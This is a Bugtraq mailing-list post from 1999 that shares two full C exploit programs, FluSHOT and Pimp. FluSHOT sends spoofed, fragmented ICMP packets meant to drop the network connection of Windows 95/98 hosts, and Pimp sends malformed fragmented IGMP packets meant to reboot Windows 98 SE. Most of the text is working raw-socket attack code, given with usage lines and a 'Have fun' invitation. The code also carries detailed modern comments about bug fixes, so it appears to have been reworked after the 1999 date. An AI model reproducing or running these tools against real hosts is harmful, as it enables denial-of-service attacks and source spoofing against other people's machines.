[11024] in bugtraq
About IGMP and another exploit for Windows95x/98x
daemon@ATHENA.MIT.EDU (Hector Leon)
Thu Jul 15 00:40:59 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <003a01becda0$424ebb30$1311b0cf@DARKSTATION>
Date: Tue, 13 Jul 1999 21:26:17 -0500
Reply-To: Hector Leon <darksun@COMPUTER-MANIACS.COM>
From: Hector Leon <darksun@COMPUTER-MANIACS.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
I got two exploits and tested them...
- The first one is Flushot by DarkShadow. This exploit can drop the network connection in Windows 95 and 98 (First Edition).
- The other one is Pimp by Rob Mosher; this exploit can reboot Windows 98 SE.
I have Red Hat Linux 5.0 installed....
Now... the exploits..
Sorry.. my english is a shit...
Have fun..
----------[FluSHOT.c START CUT HERE]--------------------------------------------------
/* Lags CPU Made By DarkShadow from The flu Hacking Group
Kills Win95-98 machines
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
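/* Prints the program banner to stdout. */
void banner(void)
{
    printf("Remote Flushot v 1.0\n\n");
    printf("\n\n");
}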
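/*
 * Prints the command-line help to stdout.
 * progname: argv[0], shown in the synopsis line (the original format string
 * had no %s, so the argument was passed but never printed).
 */
void usage(const char *progname)
{
    printf(" usage:\n");
    printf("%s [Spoofed IP] [Destination IP] [# of FLushot to Send]\n", progname);
    printf(" [Spoofed IP] : ex: 205.56.78.0\n");
    printf(" [Destination IP] : ex: 201.12.3.76\n");
    printf(" [# of FLushot to Send] : 100\n");
    printf("The Flu Hacking Group (c)\n");
    printf("DarkShadow PlimoMan Hack The Planet\n");
}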
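/*
 * Fills *addr with the IPv4 address for name (dotted quad or hostname) and
 * the given port.
 * Returns 0 on success, -1 when the name cannot be resolved or the lookup
 * does not yield a 4-byte AF_INET address (a message goes to stderr).
 * Note: like the original, "255.255.255.255" is indistinguishable from an
 * inet_addr() failure and falls through to the hostname lookup.
 */
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
    struct hostent *host;

    memset(addr, 0, sizeof *addr);
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = inet_addr(name);
    if (addr->sin_addr.s_addr == INADDR_NONE) {
        /* Not a dotted quad: fall back to a hostname lookup. */
        if ((host = gethostbyname(name)) == NULL) {
            fprintf(stderr, "ERROR: Unable to resolve host %s\n", name);
            return -1;
        }
        /* sin_addr holds 4 bytes; copying h_length bytes unchecked would
           overrun it for any other address family. */
        if (host->h_addrtype != AF_INET || host->h_length != (int)sizeof addr->sin_addr) {
            fprintf(stderr, "ERROR: Unable to resolve host %s\n", name);
            return -1;
        }
        addr->sin_family = host->h_addrtype;
        memcpy(&addr->sin_addr, host->h_addr, sizeof addr->sin_addr);
    }
    addr->sin_port = htons((uint16_t)port);
    return 0;
}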
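/*
 * Standard Internet (RFC 1071 style) one's-complement checksum over len
 * bytes at addr. An odd trailing byte is treated as the low-addressed byte
 * of a zero-padded 16-bit word, exactly as the original did.
 * Takes const void * so callers can pass any header struct without a cast;
 * words are fetched with memcpy to avoid unaligned/aliasing access.
 * Returns the checksum in the byte order of the data (store it as-is).
 */
unsigned short in_cksum(const void *addr, int len)
{
    const unsigned char *p = addr;
    unsigned int sum = 0;

    while (len > 1) {
        unsigned short w;
        memcpy(&w, p, sizeof w);
        sum += w;
        p += 2;
        len -= 2;
    }
    if (len == 1) {
        /* Pad the last byte with a zero in the high-addressed position. */
        unsigned short last = 0;
        memcpy(&last, p, 1);
        sum += last;
    }
    /* Fold the carries back into 16 bits (twice covers a second carry). */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)~sum;
}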
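/*
 * Builds one raw IP/ICMP datagram in a heap buffer and sends it as two
 * fragments through sock (a raw IPPROTO_RAW socket, so the IP header built
 * here is used as-is; on Linux the kernel fills in tot_len and the IP
 * checksum when they are zero).
 * spoof_addr: value written to the IP source field (network byte order).
 * dest_addr:  IP destination and sendto() target.
 * Returns 0 when both sendto() calls succeed, -1 on allocation or send
 * failure (errno left set by the failing call). The buffer is freed on
 * every path; the original leaked it when a sendto() failed.
 */
int send_winbomb(int sock, unsigned long spoof_addr, struct sockaddr_in *dest_addr)
{
    const size_t pkt_len = sizeof(struct iphdr) + sizeof(struct icmphdr) + 8;
    unsigned char *packet;
    struct iphdr *ip;
    struct icmphdr *icmp;
    int rc = -1;

    packet = malloc(pkt_len);
    if (packet == NULL) {
        return -1;
    }
    memset(packet, 0, pkt_len);
    ip = (struct iphdr *)packet;
    icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));

    /* First fragment: offset 0 with the "more fragments" flag, tot_len left
       zero, ICMP type 12 (parameter problem); only the ICMP header plus one
       payload byte is sent and checksummed. */
    ip->ihl = 5;
    ip->version = 4;
    ip->id = htons(1234);
    ip->frag_off |= htons(0x2000);
    ip->ttl = 30;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = spoof_addr;
    ip->daddr = dest_addr->sin_addr.s_addr;
    ip->check = in_cksum(ip, sizeof(struct iphdr));
    icmp->type = 12;
    icmp->code = 0;
    icmp->checksum = in_cksum(icmp, sizeof(struct icmphdr) + 1);
    if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1, 0,
               (struct sockaddr *)dest_addr, sizeof *dest_addr) == -1) {
        goto out;
    }

    /* Second fragment: fragment offset 1 (8 bytes), "more fragments" still
       set, full buffer length, ICMP type 0 with a zero checksum. */
    ip->tot_len = htons((uint16_t)pkt_len);
    ip->frag_off = htons(8 >> 3);
    ip->frag_off |= htons(0x2000);
    ip->check = in_cksum(ip, sizeof(struct iphdr));
    icmp->type = 0;
    icmp->code = 0;
    icmp->checksum = 0;
    if (sendto(sock, packet, pkt_len, 0,
               (struct sockaddr *)dest_addr, sizeof *dest_addr) == -1) {
        goto out;
    }
    rc = 0;
out:
    free(packet);
    return rc;
}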
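/*
 * Entry point: flushot <spoofed IP> <destination IP> <count>.
 * Resolves both addresses, then calls send_winbomb() count times with a
 * 10 ms pause between calls. Needs a raw socket (root / CAP_NET_RAW).
 * Returns 0 on completion, -1 on bad arguments, socket failure or the
 * first failed send.
 */
int main(int argc, char **argv)
{
    struct sockaddr_in dest_addr;
    unsigned long src_addr;
    int sock;
    long count;
    char *end;

    banner();
    if (argc != 4) {
        usage(argv[0]);
        return -1;
    }
    /* strtol instead of atoi: garbage or a negative count is rejected instead
       of silently becoming 0 or, via the old unsigned loop index, an almost
       endless loop. */
    count = strtol(argv[3], &end, 10);
    if (end == argv[3] || *end != '\0' || count < 0) {
        usage(argv[0]);
        return -1;
    }
    /* sock must be signed: socket() reports failure as -1, which the original
       unsigned variable could never compare below zero, so the error check
       never fired. */
    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        fprintf(stderr, "ERROR: Opening raw socket.\n");
        return -1;
    }
    /* argv[1] is the spoofed source; resolve() fills a full sockaddr, so only
       the address part is kept before dest_addr is reused for argv[2]. */
    if (resolve(argv[1], 0, &dest_addr) == -1) {
        close(sock);
        return -1;
    }
    src_addr = dest_addr.sin_addr.s_addr;
    if (resolve(argv[2], 0, &dest_addr) == -1) {
        close(sock);
        return -1;
    }
    printf("Status: Connected....packets sent.\n");
    for (long i = 0; i < count; i++) {
        if (send_winbomb(sock, src_addr, &dest_addr) == -1) {
            fprintf(stderr, "ERROR: Unable to Connect To luser.\n");
            close(sock);
            return -1;
        }
        usleep(10000);
    }
    close(sock);
    return 0;
}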
----------[FluSHOT.c END CUT HERE]--------------------------------------------------
----------[Pimp.c START CUT HERE]--------------------------------------------------
/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
/*
 * IGMP header as written into the raw packet directly after the IP header,
 * fields in transmission order (8 bytes in total).
 */
struct igmp
{
unsigned char igmp_type;    /* message type byte */
unsigned char igmp_code;    /* second header byte ("code") */
unsigned short igmp_cksum;  /* checksum field; main() leaves it 0 */
struct in_addr igmp_group;  /* group address, set from "128.1.1.1" in main() */
};
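/*
 * Fatal-error helper: prints "ERROR: <a>" and terminates with a non-zero
 * status. Diagnostics go to stderr so they do not mix with the progress
 * output on stdout. Wrapped in do/while(0) so it is safe as the body of an
 * unbraced if/else.
 */
#define ERROR(a) do { fprintf(stderr, "ERROR: %s\n", (a)); exit(-1); } while (0)
/* Resolves host to an IPv4 address in network byte order; defined after main(). */
u_long resolve(char *);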
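/*
 * Sends one piece of the prebuilt packet. A failed sendto() is reported on
 * stderr and otherwise ignored, keeping the original best-effort behaviour
 * (the original discarded the return value entirely).
 */
static void send_frag(int sock, const char *pkt, size_t len, const struct sockaddr_in *to)
{
    if (sendto(sock, pkt, len, 0, (const struct sockaddr *)to, sizeof *to) == -1) {
        perror("sendto");
    }
}

/*
 * Entry point: pimp <host>.
 * Builds a single 1500-byte raw IP/IGMP packet in pkt and, 15 times, sends
 * it as three full-size pieces with the "more fragments" flag followed by a
 * shorter final piece, sleeping half a second between rounds.
 * Needs a raw socket (root / CAP_NET_RAW). Returns 0; every failure exits
 * through ERROR().
 */
int main(int argc, char *argv[])
{
    enum { PKT_LEN = 1500, LAST_LEN = 831 };
    int nsock, ctr;
    char *pkt, *data;
    struct ip *nip;
    struct igmp *nigmp;
    struct sockaddr_in s_addr_in;

    setvbuf(stdout, NULL, _IONBF, 0);  /* progress dots must appear as printed */
    printf("pimp.c by nyt\n");
    if (argc != 2)
        ERROR("usage: pimp <host>");
    if ((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        ERROR("could not create raw socket");
    pkt = malloc(PKT_LEN);
    if (!pkt)
        ERROR("could not allocate memory");
    memset(&s_addr_in, 0, sizeof s_addr_in);
    memset(pkt, 0, PKT_LEN);
    nip = (struct ip *)pkt;
    nigmp = (struct igmp *)(pkt + sizeof(struct ip));
    data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
    /* Filler from the end of the IGMP header to the end of the buffer. */
    memset(data, 'A', PKT_LEN - (sizeof(struct ip) + sizeof(struct igmp)));
    s_addr_in.sin_family = AF_INET;  /* was left 0 (AF_UNSPEC) by the original */
    s_addr_in.sin_addr.s_addr = resolve(argv[1]);

    /* IP header. ip_sum is left 0 and ip_len is written in host byte order;
       on Linux the raw-socket path (IPPROTO_RAW implies IP_HDRINCL) fills in
       the total length and checksum itself (see raw(7)), so confirm what
       actually reaches the wire on any other platform. */
    nip->ip_v = 4;
    nip->ip_hl = 5;
    nip->ip_tos = 0;
    nip->ip_id = 69;
    nip->ip_ttl = 255;
    nip->ip_p = IPPROTO_IGMP;
    nip->ip_sum = 0;
    nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
    nip->ip_src.s_addr = 2147100000;  /* hard-coded source address as a raw 32-bit value */
    /* IGMP header: fixed type/code, zero checksum, fixed group address. */
    nigmp->igmp_type = 2;
    nigmp->igmp_code = 31;
    nigmp->igmp_cksum = 0;
    inet_aton("128.1.1.1", &nigmp->igmp_group);

    printf("pimpin' dem trick-ass-bitches");
    for (ctr = 0; ctr < 15; ctr++) {
        printf(".");
        /* Three pieces with IP_MF set at fragment offsets 0, 1480/8 and 5920/8 ... */
        nip->ip_len = PKT_LEN;
        nip->ip_off = htons(IP_MF);
        send_frag(nsock, pkt, PKT_LEN, &s_addr_in);
        nip->ip_off = htons(1480 / 8) | htons(IP_MF);
        send_frag(nsock, pkt, PKT_LEN, &s_addr_in);
        nip->ip_off = htons(5920 / 8) | htons(IP_MF);
        send_frag(nsock, pkt, PKT_LEN, &s_addr_in);
        /* ... then a shorter final piece at offset 7400/8 with the flag clear. */
        nip->ip_len = LAST_LEN;
        nip->ip_off = htons(7400 / 8);
        send_frag(nsock, pkt, LAST_LEN, &s_addr_in);
        usleep(500000);
    }
    printf("*slap* *slap* bitch, who yo daddy\n");
    shutdown(nsock, SHUT_RDWR);
    close(nsock);
    free(pkt);
    return 0;
}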
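/*
 * Resolves host (a name or dotted quad) and returns its first IPv4 address
 * in network byte order. Terminates the process on lookup failure or when
 * the result is not a 4-byte AF_INET address.
 * Fix: the original copied sizeof(he->h_addr) bytes — the size of a pointer,
 * 8 on 64-bit — out of a 4-byte address into ret, reading past h_addr.
 */
u_long resolve(char *host)
{
    struct hostent *he;
    struct in_addr addr;

    if (!(he = gethostbyname(host))) {
        herror("gethostbyname()");
        exit(-1);
    }
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof addr) {
        fprintf(stderr, "gethostbyname(): no IPv4 address for %s\n", host);
        exit(-1);
    }
    memcpy(&addr, he->h_addr, sizeof addr);
    return addr.s_addr;
}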
----------[Pimp.c END CUT HERE]--------------------------------------------------
-- Hector Leon --
darksun@computer-maniacs.com
--CiMOS Computers Rep. Dom.--